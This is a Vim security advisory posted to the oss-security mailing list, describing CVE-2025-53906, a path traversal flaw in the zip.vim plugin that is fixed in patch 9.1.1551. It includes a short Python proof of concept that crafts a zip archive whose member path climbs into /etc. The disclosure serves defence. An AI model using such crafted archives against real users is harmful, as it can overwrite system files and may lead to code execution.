[<prev] [next>] [day] [month] [year] [list]
Message-ID: <aHa8rOZSxkihIukN@256bit.org>
Date: Tue, 15 Jul 2025 22:40:12 +0200
From: Christian Brabandt <cb@...bit.org>
To: oss-security@...ts.openwall.com,
Yee Cheng Chin <ychin.macvim@...il.com>,
"T.J. Townsend" <tj@...k.me>, Ken Takata <ktakata65536@...il.com>,
Jiaqi Zhou <zeertzjq@...look.com>,
Dominique Pelle <dominique.pelle@...il.com>, mattn.jp@...il.com,
sthen@...nbsd.org, adamw@...ebsd.org,
James McCoy <jamessan@...essan.com>,
Yegappan Lakshmanan <yegappanl@...il.com>,
Doug Kearns <dougkearns@...il.com>, glepnir <glephunter@...il.com>,
Hirohito Higashi <h.east.727@...il.com>
Subject: [vim-security]: path traversal issue with zip.vim and special
crafted zip archives in Vim < v9.1.1551
path traversal issue with zip.vim and special crafted zip archives in Vim < v9.1.1551
=====================================================================================
Date: 15.07.2025
Severity: Low
CVE: CVE-2025-53906
CWE: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
### Summary
A path traversal issue in Vim’s zip.vim plugin can allow overwriting of
arbitrary files when opening specially crafted zip archives.
### Description
Vim includes the zip.vim plugin, which enables viewing and editing of files
within zip archives.
An attacker can create a zip archive that contains member files with relative
paths (e.g., ../../somefile). If such an archive is opened in Vim, and the user
saves one of these malicious files, Vim may overwrite files outside the
intended working directory.
Exploitation requires several conditions:
- The user opens a specially crafted archive in Vim.
- The user selects and attempts to edit one of the files within the archive.
- Vim writes the file back to disk using :w!.
Only after all these steps are performed would Vim overwrite an existing file
on disk.
**Note**:
- Vim does display the full path to be written, so a careful user may notice
suspicious behavior.
- Standard zip utility typically do not extract such paths and will warn or
skip them. This issue only affects Vim's internal handling, not the zip tool
itself.
### Proof of Concept
As a Proof of Concept, the following code crafts a malicious archive:
```python
import zipfile
import os
zip_path='evil.zip'
fname='file'
arcname='/etc/ax-pwn'
arcname='../../../../etc/ax-pwn'
with open(fname, 'w') as f:
f.write(f"pwned\n")
with zipfile.ZipFile(zip_path, 'w') as zipf:
zipf.write(fname, arcname)
print(f"Created {zip_path}" )
```
If the file contained in the evil.zip archive is edited through vim, typing
':w' to save it will create /etc/ax-pwn on the host filesystem (provided that
the user has sufficient permissions to write into the /etc directory.
### Impact
Impact is **low** because this exploit requires direct user interaction:
However successfully exploitation can lead to overwriting sensitive files or
placing executable code in privileged locations, depending on the permissions
of the process editing the archive.
The victim must edit such a file using Vim which will reveal the filename
and the file content, a careful user may suspect some strange things going on.
Successful exploitation could results in the ability to execute
arbitrary commands on the underlying operating system.
The Vim project would like to thank @ax for reporting this issue.
The issue has been fixed as of Vim patch v9.1.1551
[Commit](https://github.com/vim/vim/commit/586294a04179d855c3d1d4ee5ea83931963680b8)
[Github Advisory](https://github.com/vim/vim/security/advisories/GHSA-r2fw-9cw4-mj86)
Liebe Grüße
Christian
--
Wir suchen die Wahrheit, finden wollen wir sie aber nur dort, wo es
uns beliebt.
-- Marie von Ebner-Eschenbach
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
